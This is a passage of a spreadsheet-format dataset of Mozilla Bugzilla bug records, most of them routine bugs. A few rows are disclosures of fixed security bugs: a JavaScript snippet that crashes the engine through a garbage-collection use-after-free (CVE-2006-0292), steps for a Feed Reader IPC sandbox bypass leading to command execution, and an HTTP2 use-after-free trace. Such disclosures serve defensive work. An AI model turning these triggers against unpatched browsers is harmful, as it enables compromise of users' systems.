&gt;     frame #7: 0x000000010353004a XUL`mozilla::TrackUnionStream::CopyTrackData(this=0x000000011f6f6300, aInputTrack=0x00000001152f3ec0, aMapIndex=&lt;unavailable&gt;, aFrom=&lt;unavailable&gt;, aTo=649728, aOutputTrackFinished=0x0000000137b6e87f) + 714 at TrackUnionStream.cpp:286</t>
        </is>
      </c>
      <c r="X4615" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4616">
      <c r="A4616" t="n">
        <v>23513</v>
      </c>
      <c r="B4616" t="inlineStr">
        <is>
          <t>2000-01-10 08:32:06 -0800</t>
        </is>
      </c>
      <c r="C4616" t="inlineStr">
        <is>
          <t>editproducts has a bad datatype</t>
        </is>
      </c>
      <c r="D4616" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:20 -0800</t>
        </is>
      </c>
      <c r="E4616" t="n">
        <v>1</v>
      </c>
      <c r="F4616" t="n">
        <v>1</v>
      </c>
      <c r="G4616" t="n">
        <v>4</v>
      </c>
      <c r="H4616" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4616" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4616" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4616" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4616" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4616" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4616" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4616" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4616" t="inlineStr"/>
      <c r="Q4616" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4616" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4616" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T4616" t="n">
        <v>1</v>
      </c>
      <c r="U4616" t="n">
        <v>0</v>
      </c>
      <c r="V4616" t="n">
        <v>8</v>
      </c>
      <c r="W4616" t="inlineStr">
        <is>
          <t>I received the following message in the .../httpd/error_log file.
error_log.1:[Fri Jan  7 12:54:55 2000] editproducts.cgi: Argument "" isn't
numeric in ne at /home/httpd/html/bugzilla/editproducts.cgi line 607.
I'm not sure what caused the problem, but the action I was taking was the re-
enabling of the project.
I fixed the problem by changing the numeric comparison from '!=' to 'ne'
(textural)</t>
        </is>
      </c>
      <c r="X4616" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4617">
      <c r="A4617" t="n">
        <v>379777</v>
      </c>
      <c r="B4617" t="inlineStr">
        <is>
          <t>2007-05-04 13:48:04 -0700</t>
        </is>
      </c>
      <c r="C4617" t="inlineStr">
        <is>
          <t>Finalize Release Notes for Bugzilla 3.0</t>
        </is>
      </c>
      <c r="D4617" t="inlineStr">
        <is>
          <t>2007-05-08 14:23:58 -0700</t>
        </is>
      </c>
      <c r="E4617" t="n">
        <v>1</v>
      </c>
      <c r="F4617" t="n">
        <v>1</v>
      </c>
      <c r="G4617" t="n">
        <v>4</v>
      </c>
      <c r="H4617" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4617" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4617" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K4617" t="inlineStr">
        <is>
          <t>3.0</t>
        </is>
      </c>
      <c r="L4617" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4617" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4617" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4617" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4617" t="inlineStr"/>
      <c r="Q4617" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4617" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4617" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T4617" t="n">
        <v>1</v>
      </c>
      <c r="U4617" t="n">
        <v>0</v>
      </c>
      <c r="V4617" t="n">
        <v>6</v>
      </c>
      <c r="W4617" t="inlineStr">
        <is>
          <t>There are a few modifications that need to be done to the release  notes for 3.0. A few new bugs have "relnote" on them that need to go into the 3.0 Release Notes.</t>
        </is>
      </c>
      <c r="X4617" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4618">
      <c r="A4618" t="n">
        <v>1300577</v>
      </c>
      <c r="B4618" t="inlineStr">
        <is>
          <t>2016-09-05 09:07:54 -0700</t>
        </is>
      </c>
      <c r="C4618" t="inlineStr">
        <is>
          <t>"error: must call (at least) setupterm() first" in blessings when running mach lint/mach eslint</t>
        </is>
      </c>
      <c r="D4618" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E4618" t="n">
        <v>1</v>
      </c>
      <c r="F4618" t="n">
        <v>1</v>
      </c>
      <c r="G4618" t="n">
        <v>7</v>
      </c>
      <c r="H4618" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4618" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J4618" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K4618" t="inlineStr">
        <is>
          <t>47 Branch</t>
        </is>
      </c>
      <c r="L4618" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4618" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4618" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4618" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4618" t="inlineStr"/>
      <c r="Q4618" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R4618" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4618" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T4618" t="n">
        <v>1</v>
      </c>
      <c r="U4618" t="n">
        <v>0</v>
      </c>
      <c r="V4618" t="n">
        <v>19</v>
      </c>
      <c r="W4618" t="inlineStr">
        <is>
          <t>Steps to reproduce:
    git clone https://github.com/mozilla/gecko-dev
    cd gecko-dev
    ./mach eslint --setup
Expected result:
    eslint is successfully set up.
Actual result:
    abort: no repository found in '/home/user/firefox' (.hg not found)!
    Error running mach:
        ['eslint', '--setup']
    The error occurred in code that was called by the mach command. This is either
    a bug in the called code itself or in the way that mach is calling it.
    You should consider filing a bug for this issue.
    If filing a bug, please include the full output of mach, including this error
    message.
    The details of the failure are as follows:
    error: must call (at least) setupterm() first
      File "/home/user/firefox/tools/lint/mach_commands.py", line 60, in eslint
        linters=['eslint'], paths=paths, **kwargs)
      File "/home/user/firefox/python/mach/mach/registrar.py", line 123, in dispatch
        return self._run_command_handler(handler, context=context, **kwargs)
      File "/home/user/firefox/python/mach/mach/registrar.py", line 90, in _run_command_handler
        result = fn(**kwargs)
      File "/home/user/firefox/tools/lint/mach_commands.py", line 42, in lint
        return cli.run(*runargs, **lintargs)
      File "/home/user/firefox/python/mozlint/mozlint/cli.py", line 103, in run
        formatter = formatters.get(fmt)
      File "/home/user/firefox/python/mozlint/mozlint/formatters/__init__.py", line 25, in get
        return all_formatters[name](**fmtargs)
      File "/home/user/firefox/python/mozlint/mozlint/formatters/stylish.py", line 53, in __init__
        self.num_colors = self.term.number_of_colors
      File "/home/user/firefox/python/blessings/blessings/__init__.py", line 257, in number_of_colors
        colors = tigetnum('colors')  # Returns -1 if no color support, -2 if no such cap.</t>
        </is>
      </c>
      <c r="X4618" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4619">
      <c r="A4619" t="n">
        <v>1626418</v>
      </c>
      <c r="B4619" t="inlineStr">
        <is>
          <t>2020-03-31 14:46:28 -0700</t>
        </is>
      </c>
      <c r="C4619" t="inlineStr">
        <is>
          <t>fenix 4.2.0 has no crash reports</t>
        </is>
      </c>
      <c r="D4619" t="inlineStr">
        <is>
          <t>2020-04-01 10:34:29 -0700</t>
        </is>
      </c>
      <c r="E4619" t="n">
        <v>1</v>
      </c>
      <c r="F4619" t="n">
        <v>1</v>
      </c>
      <c r="G4619" t="n">
        <v>4</v>
      </c>
      <c r="H4619" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4619" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4619" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4619" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4619" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4619" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4619" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4619" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4619" t="inlineStr"/>
      <c r="Q4619" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4619" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4619" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4619" t="n">
        <v>1</v>
      </c>
      <c r="U4619" t="n">
        <v>0</v>
      </c>
      <c r="V4619" t="n">
        <v>8</v>
      </c>
      <c r="W4619" t="inlineStr">
        <is>
          <t>There are crash reports for Fenix 4.2.0b0:
https://crash-stats.mozilla.org/search/?product=Fenix&amp;version=4.2.0&amp;date=%3E%3D2020-03-24T20%3A34%3A00.000Z&amp;date=%3C2020-03-31T20%3A34%3A00.000Z&amp;_facets=signature&amp;_facets=version&amp;_facets=build_id&amp;page=1&amp;_sort=-date&amp;_columns=date&amp;_columns=signature&amp;_columns=product&amp;_columns=version&amp;_columns=build_id&amp;_columns=platform#facet-build_id
But nothing for 4.2.0 which released recently.
This bug covers figuring out why.</t>
        </is>
      </c>
      <c r="X4619" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4620">
      <c r="A4620" t="n">
        <v>316885</v>
      </c>
      <c r="B4620" t="inlineStr">
        <is>
          <t>2005-11-17 12:34:03 -0800</t>
        </is>
      </c>
      <c r="C4620" t="inlineStr">
        <is>
          <t>CVE-2006-0292 Unrooted access in jsinterp.c</t>
        </is>
      </c>
      <c r="D4620" t="inlineStr">
        <is>
          <t>2006-04-18 19:54:05 -0700</t>
        </is>
      </c>
      <c r="E4620" t="n">
        <v>1</v>
      </c>
      <c r="F4620" t="n">
        <v>1</v>
      </c>
      <c r="G4620" t="n">
        <v>3</v>
      </c>
      <c r="H4620" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4620" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4620" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4620" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4620" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4620" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4620" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4620" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4620" t="inlineStr">
        <is>
          <t>[sg:critical] Which 317714 patch?</t>
        </is>
      </c>
      <c r="Q4620" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4620" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4620" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T4620" t="n">
        <v>1</v>
      </c>
      <c r="U4620" t="n">
        <v>0</v>
      </c>
      <c r="V4620" t="n">
        <v>36</v>
      </c>
      <c r="W4620" t="inlineStr">
        <is>
          <t>The implementation of post++/-- in jsinterp.c contains the following code:
#define NONINT_INCREMENT_OP_MIDDLE()                                          \
    JS_BEGIN_MACRO                                                            \
        VALUE_TO_NUMBER(cx, rval, d);                                         \
        if (cs-&gt;format &amp; JOF_POST) {                                          \
            rtmp = rval;                                                      \
            if (!JSVAL_IS_NUMBER(rtmp)) {                                     \
                ok = js_NewNumberValue(cx, d, &amp;rtmp);                         \
                if (!ok)                                                      \
                    goto out;                                                 \
            }                                                                 \
            (cs-&gt;format &amp; JOF_INC) ? d++ : d--;                               \
            ok = js_NewNumberValue(cx, d, &amp;rval);                             \
        } else {                                                              \
            (cs-&gt;format &amp; JOF_INC) ? ++d : --d;                               \
            ok = js_NewNumberValue(cx, d, &amp;rval);                             \
            rtmp = rval;                                                      \
        }                                                                     \
        if (!ok)                                                              \
            goto out;                                                         \
    JS_END_MACRO
                NONINT_INCREMENT_OP_MIDDLE();
            }
            fp-&gt;flags |= JSFRAME_ASSIGNING;
            CACHED_SET(OBJ_SET_PROPERTY(cx, obj, id, &amp;rval));
            fp-&gt;flags &amp;= ~JSFRAME_ASSIGNING;
            if (!ok)
                goto out;
            sp += i;
            PUSH_OPND(rtmp);
This is not GC-safe when rval is not a number but is convertable to number that does not fit int JSVAL. In this case js_NewNumberValue(cx, d, &amp;rtmp) would store newly allocated double in rtmp. Later js_NewNumberValue(cx, d, &amp;rval) would displace the double from newborn array by another double value. 
Now if OBJ_SET_PROPERTY would trigger GC, then the double referenced by rtmp would be GC-ed and later stored on the stack. 
The following example demonstartes  how the bug can crash js shell:
var str_with_num = "0.1";
var obj = { 
	elem getter: function() {
		return str_with_num;
	},
	elem setter: function(value) {
		gc();
	}
};
var expected = Number(str_with_num);
var actual = obj.elem++;
gc();
if (actual !== expected)
	print("BAD result: "+actual);</t>
        </is>
      </c>
      <c r="X4620" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4621">
      <c r="A4621" t="n">
        <v>705909</v>
      </c>
      <c r="B4621" t="inlineStr">
        <is>
          <t>2011-11-28 15:16:02 -0800</t>
        </is>
      </c>
      <c r="C4621" t="inlineStr">
        <is>
          <t>App icons don't respond to clicks with HTML repo implementation</t>
        </is>
      </c>
      <c r="D4621" t="inlineStr">
        <is>
          <t>2011-12-06 16:42:54 -0800</t>
        </is>
      </c>
      <c r="E4621" t="n">
        <v>1</v>
      </c>
      <c r="F4621" t="n">
        <v>1</v>
      </c>
      <c r="G4621" t="n">
        <v>5</v>
      </c>
      <c r="H4621" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4621" t="inlineStr">
        <is>
          <t>Web Apps</t>
        </is>
      </c>
      <c r="J4621" t="inlineStr">
        <is>
          <t>HTML</t>
        </is>
      </c>
      <c r="K4621" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4621" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4621" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4621" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4621" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4621" t="inlineStr"/>
      <c r="Q4621" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4621" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4621" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4621" t="n">
        <v>1</v>
      </c>
      <c r="U4621" t="n">
        <v>0</v>
      </c>
      <c r="V4621" t="n">
        <v>4</v>
      </c>
      <c r="W4621" t="inlineStr">
        <is>
          <t>The dashboard doesn't respond to application clicks, some kind of exception is keeping it from doing anything.  (I have not been able to figure out the details of the exception, but it shows up in the console.)</t>
        </is>
      </c>
      <c r="X4621" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4622">
      <c r="A4622" t="n">
        <v>127520</v>
      </c>
      <c r="B4622" t="inlineStr">
        <is>
          <t>2002-02-23 22:50:21 -0800</t>
        </is>
      </c>
      <c r="C4622" t="inlineStr">
        <is>
          <t>Large pictures print corrupted</t>
        </is>
      </c>
      <c r="D4622" t="inlineStr">
        <is>
          <t>2008-07-31 01:14:53 -0700</t>
        </is>
      </c>
      <c r="E4622" t="n">
        <v>1</v>
      </c>
      <c r="F4622" t="n">
        <v>1</v>
      </c>
      <c r="G4622" t="n">
        <v>6</v>
      </c>
      <c r="H4622" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4622" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4622" t="inlineStr">
        <is>
          <t>Printing: Xprint</t>
        </is>
      </c>
      <c r="K4622" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4622" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4622" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4622" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4622" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4622" t="inlineStr"/>
      <c r="Q4622" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4622" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4622" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T4622" t="n">
        <v>1</v>
      </c>
      <c r="U4622" t="n">
        <v>0</v>
      </c>
      <c r="V4622" t="n">
        <v>16</v>
      </c>
      <c r="W4622" t="inlineStr">
        <is>
          <t>Printing the example URL (a large JPEG) ends in a corrupted printout.
Reproducible: Always
Steps to Reproduce:
1. Go to the example URL
2. print it
3. it prints the image in "pieces"
Config:
2002-02-23-08-trunk build on Solaris 7 SPARC, both my hacked version and the
Solaris 7 Xprt show the same problem.
----
First I thought the xlibrgb image tiling code was somehow enabled - but it
isn't. This seems to be a completly new issue. Adding some debugging output
confirms that there is only _one_ |XPutImage()| send to the Xprt server - but
the resulting output shows three Im24 instructions (the first two matches are
from the prolog):
-- snip --
% cat Xpjob_020224073511 | fgrep Im24
/Im24{gs 6 4 r tr scl 8 [3 i 0 0 5 i 0 0]{cf str3 rh p} f 3 ci}bd/Im1t{6
 4 r tr scl t [3 i 0 0 5 i 0 0]{} im}bd/Im24t{gs 6 4 r tr scl 8 [3 i 0 0
253 253 829 315 2961 1125 Im24
253 568 829 315 2961 1125 Im24
253 883 829 3 2961 11 Im24
-- snip --</t>
        </is>
      </c>
      <c r="X4622" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4623">
      <c r="A4623" t="n">
        <v>1341191</v>
      </c>
      <c r="B4623" t="inlineStr">
        <is>
          <t>2017-02-20 20:40:25 -0800</t>
        </is>
      </c>
      <c r="C4623" t="inlineStr">
        <is>
          <t>Feed Reader IPC can be used to bypass process sandboxing</t>
        </is>
      </c>
      <c r="D4623" t="inlineStr">
        <is>
          <t>2018-12-20 14:42:01 -0800</t>
        </is>
      </c>
      <c r="E4623" t="n">
        <v>1</v>
      </c>
      <c r="F4623" t="n">
        <v>1</v>
      </c>
      <c r="G4623" t="n">
        <v>6</v>
      </c>
      <c r="H4623" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4623" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J4623" t="inlineStr">
        <is>
          <t>RSS Discovery and Preview</t>
        </is>
      </c>
      <c r="K4623" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4623" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4623" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4623" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4623" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4623" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q4623" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4623" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4623" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T4623" t="n">
        <v>1</v>
      </c>
      <c r="U4623" t="n">
        <v>0</v>
      </c>
      <c r="V4623" t="n">
        <v>66</v>
      </c>
      <c r="W4623" t="inlineStr">
        <is>
          <t>Created attachment 8839322
Script PoC
Feed reader appears to have an inappropriate security model. From testing, it seems to allow the child process to change arbitrary preferences, which pretty much game over for sandboxing on its own, but it also allows for execution of arbitrary commands via nsIShellService. 
When I first looked at this, I actually thought that feed-reader was safe, due to it only listening for one message on the parentprocessmessagemanager. (FeedConverter:ExecuteClientApp) I prevoiusly thought calling  window.messageManager.addMessageListener() in the parent, wouldn't expose a messageHandler to the child. (and thus I thought the handlers at [1] were not exposed to the child)
However I've been doing some testing in the Browser Content Toolbox, and it seems possible to send messages to fire these messages. Definitely need to get some confirmation here.
Steps to reproduce:
1. Start a browser running e10s enabled
2. open any remote page (about:home) and the Browser Content Toolbox 
3. Paste the script from the attachment to launch Calculator.app (mac only)
If this test approach is valid (ie its not some devtools weirdness im overlooking) then we need to change the way the feedwriter is remoted. At a minimum we need to whitelist the pref names that can be changed, but also ensure that the file path can ONLY come from the file picker in the parent process. 
[1] http://searchfox.org/mozilla-central/source/browser/base/content/browser-feeds.js#281</t>
        </is>
      </c>
      <c r="X4623" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4624">
      <c r="A4624" t="n">
        <v>1403903</v>
      </c>
      <c r="B4624" t="inlineStr">
        <is>
          <t>2017-09-28 05:50:58 -0700</t>
        </is>
      </c>
      <c r="C4624" t="inlineStr">
        <is>
          <t>aus4-admin.mozilla.org SSL certificate has expired</t>
        </is>
      </c>
      <c r="D4624" t="inlineStr">
        <is>
          <t>2017-10-04 11:56:23 -0700</t>
        </is>
      </c>
      <c r="E4624" t="n">
        <v>1</v>
      </c>
      <c r="F4624" t="n">
        <v>1</v>
      </c>
      <c r="G4624" t="n">
        <v>2</v>
      </c>
      <c r="H4624" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4624" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J4624" t="inlineStr">
        <is>
          <t>Operations: Miscellaneous</t>
        </is>
      </c>
      <c r="K4624" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4624" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4624" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4624" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4624" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4624" t="inlineStr"/>
      <c r="Q4624" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4624" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4624" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4624" t="n">
        <v>1</v>
      </c>
      <c r="U4624" t="n">
        <v>0</v>
      </c>
      <c r="V4624" t="n">
        <v>4</v>
      </c>
      <c r="W4624" t="inlineStr">
        <is>
          <t>$ echo | openssl s_client -showcerts -servername gnupg.org -connect aus4-admin.mozilla.org:443 2&gt;/dev/null | openssl x509 -inform pem -noout -text
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            0b:cd:ac:47:1c:e3:0d:93:c9:41:48:6c:ab:0d:17:85
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA
        Validity
            Not Before: Sep 23 00:00:00 2016 GMT
            Not After : Sep 28 12:00:00 2017 GMT
Very urgent to fix - nightlies are broken, and we have a release starting in a few hours.</t>
        </is>
      </c>
      <c r="X4624" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4625">
      <c r="A4625" t="n">
        <v>1422421</v>
      </c>
      <c r="B4625" t="inlineStr">
        <is>
          <t>2017-12-01 14:42:40 -0800</t>
        </is>
      </c>
      <c r="C4625" t="inlineStr">
        <is>
          <t>Dont fetch bookmark status on page load and url focus</t>
        </is>
      </c>
      <c r="D4625" t="inlineStr">
        <is>
          <t>2017-12-05 11:40:47 -0800</t>
        </is>
      </c>
      <c r="E4625" t="n">
        <v>1</v>
      </c>
      <c r="F4625" t="n">
        <v>1</v>
      </c>
      <c r="G4625" t="n">
        <v>2</v>
      </c>
      <c r="H4625" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4625" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J4625" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K4625" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4625" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4625" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N4625" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4625" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4625" t="inlineStr"/>
      <c r="Q4625" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4625" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4625" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4625" t="n">
        <v>1</v>
      </c>
      <c r="U4625" t="n">
        <v>0</v>
      </c>
      <c r="V4625" t="n">
        <v>3</v>
      </c>
      <c r="W4625" t="inlineStr">
        <is>
          <t>This is a hold over from when the bookmark button used to be in the toolbar and it needed to update when the state of bookmarks changed. 
Now that the bookmark status only appears in the page actions menu. we no longer need to know the bookmark status of a page right away.</t>
        </is>
      </c>
      <c r="X4625" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4626">
      <c r="A4626" t="n">
        <v>1528481</v>
      </c>
      <c r="B4626" t="inlineStr">
        <is>
          <t>2019-02-16 05:10:25 -0800</t>
        </is>
      </c>
      <c r="C4626" t="inlineStr">
        <is>
          <t>use after free in HTTP2 code, mozilla::net::Http2Session::RecvPushPromise (Http2Session.cpp)</t>
        </is>
      </c>
      <c r="D4626" t="inlineStr">
        <is>
          <t>2024-05-30 09:56:35 -0700</t>
        </is>
      </c>
      <c r="E4626" t="n">
        <v>1</v>
      </c>
      <c r="F4626" t="n">
        <v>1</v>
      </c>
      <c r="G4626" t="n">
        <v>3</v>
      </c>
      <c r="H4626" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4626" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4626" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K4626" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4626" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4626" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4626" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4626" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4626" t="inlineStr">
        <is>
          <t>[necko-triaged][post-critsmash-triage][adv-main68+][adv-esr60.8+]</t>
        </is>
      </c>
      <c r="Q4626" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4626" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4626" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T4626" t="n">
        <v>1</v>
      </c>
      <c r="U4626" t="n">
        <v>0</v>
      </c>
      <c r="V4626" t="n">
        <v>23</v>
      </c>
      <c r="W4626" t="inlineStr">
        <is>
          <t>I observed a use after free in the HTTP2 code with the optimized ASAN builds.
From the line numbers the bug should be somewhere in Http2Session.cpp between line 2049 and 2016:
      if (NS_FAILED(ds-&gt;AsyncOpenURI(
              pushedURL, EmptyCString(),
              nsICacheStorage::OPEN_READONLY | nsICacheStorage::OPEN_SECRETLY,
              cpcc))) {
        LOG3(
            ("Http2Session::RecvPushPromise %p failed to open cache entry for "
             "push check",
             self));
      }
    }
  }
  pushedStream-&gt;SetHTTPState(Http2Stream::RESERVED_BY_REMOTE);
Stack trace:
```
==18805==ERROR: AddressSanitizer: heap-use-after-free on address 0x61400042eebc at pc 0x7f4330719163 bp 0x7f42e6c19410 sp 0x7f42e6c19408
WRITE of size 4 at 0x61400042eebc thread T8 (Socket Thread)
    #0 0x7f4330719162 in SetHTTPState /builds/worker/workspace/build/src/netwerk/protocol/http/Http2Stream.h:62:45
